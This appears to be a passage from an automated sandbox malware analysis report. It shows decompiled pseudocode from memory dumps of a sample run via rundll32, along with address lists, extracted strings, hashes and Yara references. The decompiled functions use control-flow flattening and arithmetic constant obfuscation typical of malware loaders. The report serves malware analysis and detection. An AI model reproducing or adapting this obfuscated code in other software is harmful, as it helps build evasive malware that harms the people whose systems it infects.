				_v560 = _v560 << 0xd;
				_v560 = _v560 ^ 0xceea6264;
				do {
					while(_t124 != 0x32e36bf) {
						if(_t124 == 0xcc4ee6e) {
							 *((intOrPtr*)(_t123 + 0x24)) = _t104;
							_t97 =  *0xb3ca24; // 0x0
							 *(_t123 + 0x2c) = _t97;
							 *0xb3ca24 = _t123;
							return _t97;
						}
						if(_t124 != 0x1663684c) {
							if(_t124 == 0x2308bbf2) {
								return E00B2F536(_v548, _v564, _v560, _t123);
							}
							if(_t124 != 0x242d3c72) {
								goto L12;
							} else {
								_push( &_v520);
								_t101 = E00B288E5(_t104, _t128);
								asm("sbb esi, esi");
								_t107 = 0xb3c910;
								_t124 = ( ~_t101 & 0xe0257acd) + 0x2308bbf2;
								continue;
							}
							L16:
							return _t101;
						}
						_push(_t107);
						_t108 = 0x38;
						_t101 = E00B28736(_t108);
						_t123 = _t101;
						_t107 = _t107;
						if(_t123 != 0) {
							_t124 = 0x242d3c72;
							continue;
						}
						goto L16;
					}
					_push(_t107);
					_push(_v556);
					_push( &_v520);
					_push(_v568);
					_push(0);
					_push(_v552);
					_t107 = _v572;
					_push(0);
					_t96 = E00B2568E(_t107, 0);
					_t129 =  &(_t129[7]);
					if(_t96 == 0) {
						_t124 = 0x2308bbf2;
						goto L12;
					} else {
						_t124 = 0xcc4ee6e;
						continue;
					}
					goto L16;
					L12:
				} while (_t124 != 0x2bbec955);
				return _t101;
			}

0x00b26754
0x00b2675a
0x00b2675f
0x00b26767
0x00b2676f
0x00b26777
0x00b2677c
0x00b26784
0x00b2678c
0x00b26794
0x00b2679c
0x00b267a4
0x00b267a9
0x00b267b1
0x00b267b8
0x00b267bc
0x00b267cb
0x00b267cf
0x00b267d1
0x00b267db
0x00b267e3
0x00b267e5
0x00b267ed
0x00b267f2
0x00b267fa
0x00b26809
0x00b2680c
0x00b26810
0x00b2681d
0x00b26821
0x00b26829
0x00b26839
0x00b2683d
0x00b26842
0x00b2684a
0x00b26852
0x00b26857
0x00b2685f
0x00b26867
0x00b2686b
0x00b26877
0x00b2687a
0x00b2687e
0x00b26882
0x00b2688a
0x00b26892
0x00b26897
0x00b2689c
0x00b268a4
0x00b268a4
0x00b268b2
0x00b26984
0x00b26987
0x00b2698c
0x00b2698f
0x00000000
0x00b2698f
0x00b268be
0x00b268c6
0x00000000
0x00b26981
0x00b268d2
0x00000000
0x00b268d8
0x00b268de
0x00b268e6
0x00b268f0
0x00b268f8
0x00b268f9
0x00000000
0x00b268f9
0x00b2699f
0x00b2699f
0x00b2699f
0x00b2690d
0x00b26911
0x00b26912
0x00b26917
0x00b2691a
0x00b2691d
0x00b2691f
0x00000000
0x00b2691f
0x00000000
0x00b2691d
0x00b26929
0x00b2692a
0x00b26934
0x00b26935
0x00b26939
0x00b2693b
0x00b2693f
0x00b26943
0x00b26945
0x00b2694a
0x00b2694f
0x00b2695b
0x00000000
0x00b26951
0x00b26951
0x00000000
0x00b26951
0x00000000
0x00b26960
0x00b26960
0x00000000

Strings

:z, xrefs: 00B2677C
zA, xrefs: 00B26882
r<-$, xrefs: 00B2691F
u, xrefs: 00B2688A
r<-$, xrefs: 00B268CC

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: :z$r<-$$r<-$$u$zA
API String ID: 0-4189644680
Opcode ID: 3598435d803b841d5e6e651600daffa6a465214171544485fe7684a7a5cddb54
Instruction ID: 564a5f983b6451498abd41bd073a960e03a44e6989567c5f4d99338d62500e6a
Opcode Fuzzy Hash: 3598435d803b841d5e6e651600daffa6a465214171544485fe7684a7a5cddb54
Instruction Fuzzy Hash: 56518B715083119FD318CF26D44951FBBE0EBC8758F104A9DF4D8A62A0D7748A498F82

Uniqueness

Uniqueness Score: -1.00%

Function 100012B1, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100012B1(struct HINSTANCE__* _a4, int _a8) {
				signed int _v8;
				void* _v140;
				struct _OSVERSIONINFOA _v156;
				void* __ebp;
				signed int _t8;
				void* _t22;
				struct HINSTANCE__* _t25;
				struct HWND__* _t26;
				signed int _t27;

				_t8 =  *0x1004d054; // 0xd94e5c04
				_v8 = _t8 ^ _t27;
				_t25 = _a4;
				 *0x1004db64 = _t25;
				_v156.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v156);
				_t13 =  ==  ? 1 :  *0x1004dc35 & 0x000000ff;
				 *0x1004dc35 =  ==  ? 1 :  *0x1004dc35 & 0x000000ff;
				_t26 = CreateWindowExA(0, 0x1004dbd0, 0x1004db68, 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, _t25, 0);
				if(_t26 != 0) {
					ShowWindow(_t26, _a8);
					UpdateWindow(_t26);
				}
				return E100037EA(1, _v8 ^ _t27, _t22);
			}

0x100012ba
0x100012c1
0x100012c5
0x100012d0
0x100012d6
0x100012e0
0x100012f7
0x10001301
0x10001324
0x10001328
0x1000132e
0x10001335
0x1000133b
0x1000134a

APIs

GetVersionExA.KERNEL32(?), ref: 100012E0
CreateWindowExA.USER32 ref: 1000131E
ShowWindow.USER32(00000000,?), ref: 1000132E
UpdateWindow.USER32 ref: 10001335

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Window$CreateShowUpdateVersion
String ID:
API String ID: 738887465-0
Opcode ID: 77d7adeb2b38e3cd895246d4cacae244cc3e5b3733acf5e48cb798dca9cd61a3
Instruction ID: 341d4f5b6357358a1a841b5e4f677a2f36a9486d77b2b7535788157dddeffb30
Opcode Fuzzy Hash: 77d7adeb2b38e3cd895246d4cacae244cc3e5b3733acf5e48cb798dca9cd61a3
Instruction Fuzzy Hash: 3F01B571610138BFE7149B24CE89FAB7BACEB46200F41415AF905D3210CB70AE45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00B25B79, Relevance: 5.2, Strings: 4, Instructions: 219
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B25B79(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr* _t203;
				intOrPtr _t214;
				intOrPtr _t215;
				intOrPtr _t216;
				intOrPtr _t220;
				intOrPtr _t224;
				void* _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				intOrPtr _t250;
				intOrPtr _t252;
				signed int* _t253;

				_t215 = __ecx;
				_t253 =  &_v116;
				_v20 = __edx;
				_v32 = __ecx;
				_v12 = 0xafae1;
				_v4 = 0;
				_v8 = 0x46e7c7;
				_v100 = 0x4e85;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0xa122;
				_v100 = _v100 ^ 0x0000ef7f;
				_v76 = 0x276c;
				_v76 = _v76 + 0xa4ad;
				_v76 = _v76 ^ 0x0000a5d4;
				_v116 = 0xc292;
				_v36 = 0;
				_v116 = _v116 * 0x3d;
				_t243 = 0x5ac7f3d;
				_v116 = _v116 << 0xc;
				_t246 = 0x1a;
				_v116 = _v116 / _t246;
				_v116 = _v116 ^ 0x08d6c610;
				_v96 = 0x57a;
				_v96 = _v96 << 4;
				_v96 = _v96 + 0xde71;
				_v96 = _v96 ^ 0x000109c0;
				_v108 = 0xf9e9;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 + 0xffffa4d5;
				_t247 = 0x1e;
				_v108 = _v108 * 0x3c;
				_v108 = _v108 ^ 0xffeac835;
				_v112 = 0x3502;
				_v112 = _v112 >> 0xc;
				_v112 = _v112 + 0xffffe509;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 ^ 0x0003f015;
				_v64 = 0x4162;
				_v64 = _v64 + 0xffff06ec;
				_v64 = _v64 ^ 0xffff0d41;
				_v68 = 0x29f6;
				_v68 = _v68 | 0xa40114db;
				_v68 = _v68 ^ 0xa4015458;
				_v72 = 0x8ebc;
				_v72 = _v72 | 0xb773f5bd;
				_v72 = _v72 ^ 0xb773df20;
				_v52 = 0x199c;
				_v52 = _v52 + 0x59c9;
				_v52 = _v52 ^ 0x00005d96;
				_v56 = 0x9de2;
				_v56 = _v56 | 0x18b104fc;
				_v56 = _v56 ^ 0x18b18c09;
				_v60 = 0xcf04;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x0000237a;
				_v92 = 0x847f;
				_v92 = _v92 / _t247;
				_v92 = _v92 + 0xfffff45a;
				_v92 = _v92 ^ 0xffffeb4a;
				_v104 = 0x72c3;
				_v104 = _v104 * 0x70;
				_v104 = _v104 >> 0xa;
				_v104 = _v104 + 0xffffb2c0;
				_v104 = _v104 ^ 0xffff9126;
				_v48 = 0x26a;
				_t248 = 0x5f;
				_v48 = _v48 / _t248;
				_v48 = _v48 ^ 0x00002d62;
				_v88 = 0x3bd5;
				_v88 = _v88 | 0xeefd350a;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x777ec4bd;
				_v44 = 0x124c;
				_v44 = _v44 + 0xffff1b1d;
				_v44 = _v44 ^ 0xffff4aeb;
				_v80 = 0x5ade;
				_t249 = 0x3c;
				_t252 = _v20;
				_t214 = _v20;
				_v80 = _v80 * 0x3a;
				_v80 = _v80 + 0xffff943f;
				_v80 = _v80 ^ 0x0014640e;
				_v84 = 0x6f1d;
				_t250 = _v16;
				_v84 = _v84 / _t249;
				_v84 = _v84 * 0x74;
				_v84 = _v84 ^ 0x0000fa63;
				_t199 = _v40;
				while(_t243 != 0x5ac7f3d) {
					if(_t243 == 0x17993a65) {
						_t216 = E00B3023A(_t215, _v96, _v108, _t199, _v112, _t252,  &_v28);
						_t253 =  &(_t253[5]);
						_v36 = _t216;
						if(_t216 == 0) {
							_t244 = _v36;
							goto L19;
						} else {
							_t220 = _v28;
							if(_t220 == 0) {
								goto L15;
							} else {
								_t199 = _v40 + _t220;
								_v40 = _v40 + _t220;
								_t252 = _t252 - _t220;
								if(_t252 != 0) {
									goto L6;
								} else {
									_t224 = _t250 + _t250;
									_push(_t224);
									_push(_t224);
									_v24 = _t224;
									_t245 = E00B28736(_t224);
									if(_t245 == 0) {
										goto L15;
									} else {
										E00B32674(_v52, _v56, _t250, _t245, _v60, _v92, _t214);
										E00B2F536(_v104, _v48, _v88, _t214);
										_t252 = _t250;
										_t199 = _t245 + _t250;
										_t250 = _v24;
										_t253 =  &(_t253[7]);
										_v40 = _t199;
										_t214 = _t245;
										if(_t252 == 0) {
											goto L15;
										} else {
											goto L6;
										}
									}
								}
							}
						}
					} else {
						if(_t243 != 0x1ebe7f62) {
							L14:
							if(_t243 != 0x20fb0f57) {
								continue;
							} else {
								goto L15;
							}
						} else {
							_t250 = 0x10000;
							_push(_t215);
							_push(_t215);
							_t199 = E00B28736(0x10000);
							_t214 = _t199;
							if(_t214 == 0) {
								L15:
								_t244 = _v36;
								if(_t244 == 0) {
									L19:
									E00B2F536(_v44, _v80, _v84, _t214);
								} else {
									_t203 = _v20;
									 *_t203 = _t214;
									 *((intOrPtr*)(_t203 + 4)) = _t250 - _t252;
								}
							} else {
								_v40 = _t199;
								_t252 = 0x10000;
								L6:
								_t215 = _v32;
								_t243 = 0x17993a65;
								continue;
							}
						}
					}
					return _t244;
				}
				_t243 = 0x1ebe7f62;
				goto L14;
			}

0x00b25b79
0x00b25b79
0x00b25b80
0x00b25b84
0x00b25b88
0x00b25b92
0x00b25b99
0x00b25ba1
0x00b25ba9
0x00b25bae
0x00b25bb6
0x00b25bbe
0x00b25bc6
0x00b25bce
0x00b25bd6
0x00b25bde
0x00b25be7
0x00b25beb
0x00b25bf0
0x00b25bfd
0x00b25c02
0x00b25c08
0x00b25c10
0x00b25c18
0x00b25c1d
0x00b25c25
0x00b25c2d
0x00b25c35
0x00b25c3a
0x00b25c47
0x00b25c48
0x00b25c4c
0x00b25c54
0x00b25c5c
0x00b25c61
0x00b25c69
0x00b25c6e
0x00b25c76
0x00b25c7e
0x00b25c86
0x00b25c8e
0x00b25c96
0x00b25c9e
0x00b25ca6
0x00b25cae
0x00b25cb6
0x00b25cbe
0x00b25cc6
0x00b25cce
0x00b25cd6
0x00b25cde
0x00b25ce6
0x00b25cee
0x00b25cf6
0x00b25cfb
0x00b25d03
0x00b25d11
0x00b25d15
0x00b25d1d
0x00b25d25
0x00b25d32
0x00b25d36
0x00b25d3b
0x00b25d43
0x00b25d4d
0x00b25d5b
0x00b25d60
0x00b25d66
0x00b25d6e
0x00b25d76
0x00b25d7e
0x00b25d82
0x00b25d8a
0x00b25d92
0x00b25d9a
0x00b25da2
0x00b25daf
0x00b25db0
0x00b25db4
0x00b25db8
0x00b25dbc
0x00b25dc4
0x00b25dcc
0x00b25dda
0x00b25dde
0x00b25de7
0x00b25deb
0x00b25df3
0x00b25df7
0x00b25e09
0x00b25e66
0x00b25e68
0x00b25e6b
0x00b25e71
0x00b25f29
0x00000000
0x00b25e77
0x00b25e77
0x00b25e7d
0x00000000
0x00b25e83
0x00b25e87
0x00b25e89
0x00b25e8d
0x00b25e8f
0x00000000
0x00b25e91
0x00b25e95
0x00b25ea0
0x00b25ea1
0x00b25ea2
0x00b25eab
0x00b25eb1
0x00000000
0x00b25eb3
0x00b25ec6
0x00b25ed8
0x00b25edd
0x00b25edf
0x00b25ee2
0x00b25ee9
0x00b25eec
0x00b25ef0
0x00b25ef4
0x00000000
0x00b25ef6
0x00000000
0x00b25ef6
0x00b25ef4
0x00b25eb1
0x00b25e8f
0x00b25e7d
0x00b25e0b
0x00b25e11
0x00b25f00
0x00b25f06
0x00000000
0x00000000
0x00000000
0x00000000
0x00b25e17
0x00b25e1b
0x00b25e28
0x00b25e29
0x00b25e2c
0x00b25e31
0x00b25e37
0x00b25f0c
0x00b25f0c
0x00b25f12
0x00b25f2d
0x00b25f3a
0x00b25f14
0x00b25f14
0x00b25f1a
0x00b25f1c
0x00b25f1c
0x00b25e3d
0x00b25e3d
0x00b25e41
0x00b25e43
0x00b25e43
0x00b25e47
0x00000000
0x00b25e47
0x00b25e37
0x00b25e11
0x00b25f28
0x00b25f28
0x00b25efb
0x00000000

Strings

b-, xrefs: 00B25D66
bA, xrefs: 00B25C76
l', xrefs: 00B25BBE
z#, xrefs: 00B25CFB

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: b-$bA$l'$z#
API String ID: 0-3285866504
Opcode ID: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
Instruction ID: 8b3d9c890354cbb612d12aa6c24a9c3e6969924e59ddf25d8a7608671f359e79
Opcode Fuzzy Hash: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
Instruction Fuzzy Hash: C6A140B15087829FD364CF29D48981FBBE1FBC4718F508A1DF59586260D3B4DA098F83

Uniqueness

Uniqueness Score: -1.00%

Function 00B280BA, Relevance: 5.1, Strings: 4, Instructions: 138
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00B280BA(intOrPtr* __ecx, void* __edx, intOrPtr _a4, signed int* _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t96;
				signed int _t110;
				signed int _t115;
				void* _t118;
				intOrPtr* _t132;
				signed int* _t133;
				signed int* _t136;

				_t133 = _a8;
				_push(_t133);
				_push(_a4);
				_t132 = __ecx;
				_push(__ecx);
				E00B2602B(_t96);
				_v96 = 0xfd71;
				_t136 =  &(( &_v124)[4]);
				_v96 = _v96 >> 3;
				_v96 = _v96 ^ 0x00001ccd;
				_t118 = 0x30cb7a4b;
				_v120 = 0xdf4c;
				_t115 = 3;
				_v120 = _v120 * 0xb;
				_v120 = _v120 << 0xb;
				_v120 = _v120 ^ 0x4cc20427;
				_v100 = 0xc552;
				_v100 = _v100 << 1;
				_v100 = _v100 ^ 0x0001a6ce;
				_v124 = 0x18f9;
				_v124 = _v124 ^ 0xb394f6a4;
				_v124 = _v124 | 0xdedfeaf6;
				_v124 = _v124 ^ 0xffdfdfcb;
				_v104 = 0x111;
				_v104 = _v104 / _t115;
				_v104 = _v104 ^ 0x000052be;
				_v108 = 0x5c9e;
				_v108 = _v108 * 0x3f;
				_v108 = _v108 ^ 0x0016b186;
				_v112 = 0xa32c;
				_v112 = _v112 << 3;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000047d3;
				_v116 = 0x4558;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 ^ 0x0dcfa8f2;
				_v116 = _v116 ^ 0x0dcf9328;
				_v92 = 0xa46a;
				_v92 = _v92 | 0x10f37349;
				_v92 = _v92 ^ 0x10f3c95f;
				_v80 = 0x75fc;
				_v80 = _v80 | 0x150fa2b7;
				_v80 = _v80 ^ 0x150fb0d6;
				_v84 = 0x120;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x00001616;
				_v88 = 0x286e;
				_v88 = _v88 * 0x36;
				_v88 = _v88 ^ 0x0008f8fa;
				do {
					while(_t118 != 0x75fb138) {
						if(_t118 == 0xe7893d9) {
							E00B3360F( &_v76, _v112, _v116,  *_t132, _v92);
							_t136 =  &(_t136[3]);
							_t118 = 0x75fb138;
							continue;
						} else {
							if(_t118 == 0xf76409b) {
								_push(_t118);
								_push(_t118);
								_t110 = E00B28736(_t133[1]);
								 *_t133 = _t110;
								__eflags = _t110;
								if(__eflags != 0) {
									_t118 = 0x11f2e7ae;
									continue;
								}
							} else {
								if(_t118 == 0x11f2e7ae) {
									E00B350F2( &_v76, _v124, _v104, _v108, _t133);
									_t136 =  &(_t136[3]);
									_t118 = 0xe7893d9;
									continue;
								} else {
									if(_t118 == 0x25eae02b) {
										_t133[1] = E00B361B8(_t132);
										_t118 = 0xf76409b;
										continue;
									} else {
										if(_t118 != 0x30cb7a4b) {
											goto L14;
										} else {
											 *_t133 = 0;
											_t118 = 0x25eae02b;
											_t133[1] = 0;
											continue;
										}
									}
								}
							}
						}
						goto L15;
					}
					E00B27998(_v80, _v84, __eflags, _t132 + 4,  &_v76, _v88);
					_t136 =  &(_t136[3]);
					_t118 = 0x2f2a8f34;
					L14:
					__eflags = _t118 - 0x2f2a8f34;
				} while (__eflags != 0);
				L15:
				__eflags =  *_t133;
				_t95 =  *_t133 != 0;
				__eflags = _t95;
				return 0 | _t95;
			}

0x00b280c0
0x00b280c8
0x00b280c9
0x00b280d0
0x00b280d3
0x00b280d4
0x00b280d9
0x00b280e1
0x00b280e4
0x00b280eb
0x00b280f3
0x00b280f8
0x00b2810c
0x00b2810d
0x00b28111
0x00b28116
0x00b2811e
0x00b28126
0x00b2812a
0x00b28132
0x00b2813a
0x00b28142
0x00b2814a
0x00b28152
0x00b28160
0x00b28164
0x00b2816c
0x00b28179
0x00b2817d
0x00b28185
0x00b2818d
0x00b28192
0x00b28197
0x00b2819f
0x00b281a7
0x00b281ac
0x00b281b4
0x00b281bc
0x00b281c4
0x00b281cc
0x00b281d4
0x00b281dc
0x00b281e4
0x00b281ec
0x00b281f4
0x00b281f9
0x00b28201
0x00b2820e
0x00b28212
0x00b2821c
0x00b2821c
0x00b2822e
0x00b282c8
0x00b282cd
0x00b282d0
0x00000000
0x00b28234
0x00b2823a
0x00b2829d
0x00b2829e
0x00b282a2
0x00b282a7
0x00b282ab
0x00b282ad
0x00b282af
0x00000000
0x00b282af
0x00b2823c
0x00b2823e
0x00b28282
0x00b28287
0x00b2828a
0x00000000
0x00b28240
0x00b28246
0x00b28267
0x00b2826a
0x00000000
0x00b28248
0x00b2824e
0x00000000
0x00b28254
0x00b28254
0x00b28256
0x00b2825b
0x00000000
0x00b2825b
0x00b2824e
0x00b28246
0x00b2823e
0x00b2823a
0x00000000
0x00b2822e
0x00b282ef
0x00b282f4
0x00b282f7
0x00b282fc
0x00b282fc
0x00b282fc
0x00b28309
0x00b2830b
0x00b2830f
0x00b2830f
0x00b28316

Strings

n(, xrefs: 00B28201
XE, xrefs: 00B2819F
+%, xrefs: 00B28240
+%, xrefs: 00B28256

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +%$+%$XE$n(
API String ID: 0-3838449085
Opcode ID: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
Instruction ID: e9b3a02a94f5a043f46ff22f12ffc18400dad6d2e18b35d630744df628046982
Opcode Fuzzy Hash: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
Instruction Fuzzy Hash: 7A51567010A7019FD358DF20D88981BBBE1FF94748F505A1DF18A96261DBB58A49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00B38D1C, Relevance: 5.1, Strings: 4, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B38D1C(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t108;
				intOrPtr _t110;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t144;
				intOrPtr* _t145;
				void* _t146;
				intOrPtr* _t147;

				_v36 = 0x4ef4;
				_v36 = _v36 + 0xa860;
				_v36 = _v36 | 0x1c77c6a8;
				_t121 = 0x2a;
				_v36 = _v36 / _t121;
				_v36 = _v36 ^ 0x00adf3e3;
				_v16 = 0xcfa4;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x33e94134;
				_v24 = 0x2a39;
				_v24 = _v24 ^ 0x66b190f2;
				_v24 = _v24 + 0x3fe;
				_v24 = _v24 ^ 0x66b19dc3;
				_v12 = 0x275a;
				_v12 = _v12 ^ 0xee83f1bc;
				_v12 = _v12 ^ 0xee83c69b;
				_v20 = 0x82c0;
				_v20 = _v20 | 0x74e44d6f;
				_v20 = _v20 ^ 0xeca8f7fc;
				_v20 = _v20 ^ 0x984c40be;
				_v32 = 0xcbb2;
				_v32 = _v32 ^ 0xf8a1ef7c;
				_t122 = 0x26;
				_v32 = _v32 / _t122;
				_v32 = _v32 ^ 0xc0a4f16a;
				_v32 = _v32 ^ 0xc62e2f9a;
				_v28 = 0xce4d;
				_t123 = 0x68;
				_v28 = _v28 / _t123;
				_t124 = 0xf;
				_v28 = _v28 / _t124;
				_v28 = _v28 ^ 0x15eb9a2e;
				_v28 = _v28 ^ 0x15ebc86f;
				_v4 = 0x1911;
				_v4 = _v4 ^ 0x7b1b0330;
				_v4 = _v4 ^ 0x7b1b2d08;
				_v8 = 0x92f;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00005602;
				_t108 = E00B385BA(_t124);
				_t144 = _a4;
				_t146 = _t108;
				_v36 = 0x94f3;
				_v36 = _v36 + 0xffff06f8;
				_v36 = _v36 | 0xf59d433d;
				_v36 = _v36 >> 0xe;
				_t148 = _t144 + 0x24;
				_v36 = _v36 ^ 0x0003ffff;
				_t120 = E00B2E29C(_v16, _v24, _t144 + 0x24);
				_t110 =  *((intOrPtr*)(_t144 + 8));
				if(_t110 != _v36 && _t110 != _t146) {
					_t127 =  *((intOrPtr*)(_t144 + 0x18));
					if(_t127 != _v36 && _t127 != _t146) {
						_t145 = _a8;
						_t128 =  *_t145;
						if(E00B38D05(_t128, _t120) == 0) {
							_push(_t128);
							_push(_t128);
							_t147 = E00B28736(0x224);
							if(_t147 != 0) {
								_t95 = _t147 + 0xc; // 0xc
								E00B26636(_t95, _v28, _v4, _v8, _t148);
								 *_t147 = _t120;
								 *((intOrPtr*)(_t147 + 0x220)) =  *_t145;
								 *_t145 = _t147;
							}
						}
					}
				}
				return 1;
			}

0x00b38d1f
0x00b38d28
0x00b38d2f
0x00b38d3f
0x00b38d44
0x00b38d4a
0x00b38d52
0x00b38d5a
0x00b38d5f
0x00b38d67
0x00b38d6f
0x00b38d77
0x00b38d7f
0x00b38d87
0x00b38d8f
0x00b38d97
0x00b38d9f
0x00b38da7
0x00b38daf
0x00b38db7
0x00b38dbf
0x00b38dc7
0x00b38dd3
0x00b38dd8
0x00b38dde
0x00b38de6
0x00b38dee
0x00b38dfa
0x00b38dff
0x00b38e09
0x00b38e0c
0x00b38e10
0x00b38e18
0x00b38e20
0x00b38e28
0x00b38e30
0x00b38e38
0x00b38e40
0x00b38e45
0x00b38e51
0x00b38e56
0x00b38e5a
0x00b38e5c
0x00b38e64
0x00b38e6c
0x00b38e74
0x00b38e79
0x00b38e7c
0x00b38e92
0x00b38e94
0x00b38e9c
0x00b38ea2
0x00b38ea9
0x00b38eaf
0x00b38eb5
0x00b38ebe
0x00b38ecc
0x00b38ecd
0x00b38ed8
0x00b38ede
0x00b38ee5
0x00b38ef0
0x00b38ef5
0x00b38efc
0x00b38f02
0x00b38f02
0x00b38ede
0x00b38ebe
0x00b38ea9
0x00b38f0e

Strings

9*, xrefs: 00B38D67
oMt, xrefs: 00B38DA7
/, xrefs: 00B38E38
4A3, xrefs: 00B38D5F

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /$4A3$9*$oMt
API String ID: 0-1186868077
Opcode ID: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
Instruction ID: baa71839e5d6b6ba52aee2372cdb6fc1bb8a45bb6a473b34652c557cbe7cbe1a
Opcode Fuzzy Hash: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
Instruction Fuzzy Hash: 655144716083429FD358CF25D48A90BFBE1FB98758F204A1CF49996260D7B4DA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00B22A30, Relevance: 5.1, Strings: 4, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00B22A30(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v124;
				void* _t120;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				intOrPtr _t146;

				_v12 = 0xa0d7;
				_v12 = _v12 + 0x7eb;
				_v12 = _v12 + 0xffff9690;
				_t130 = 0x70;
				_v12 = _v12 / _t130;
				_v12 = _v12 ^ 0x00005cb7;
				_v36 = 0xa6e2;
				_t131 = 0x7c;
				_t146 = _a4;
				_v36 = _v36 * 0x6c;
				_v36 = _v36 ^ 0x00462f2b;
				_v20 = 0xf5ce;
				_v20 = _v20 + 0xec5e;
				_v20 = _v20 | 0x882d1c6f;
				_v20 = _v20 ^ 0x882decee;
				_v8 = 0xef73;
				_v8 = _v8 * 0x50;
				_v8 = _v8 ^ 0x984778b6;
				_v8 = _v8 | 0x0acb781a;
				_v8 = _v8 ^ 0x9acfaccf;
				_v16 = 0xf20c;
				_t132 = 0x6d;
				_v16 = _v16 / _t131;
				_v16 = _v16 | 0x2a1cc570;
				_v16 = _v16 * 0x5c;
				_v16 = _v16 ^ 0x225769f1;
				_v28 = 0xd318;
				_v28 = _v28 / _t132;
				_v28 = _v28 ^ 0x955bcf9a;
				_v28 = _v28 ^ 0x955bcc47;
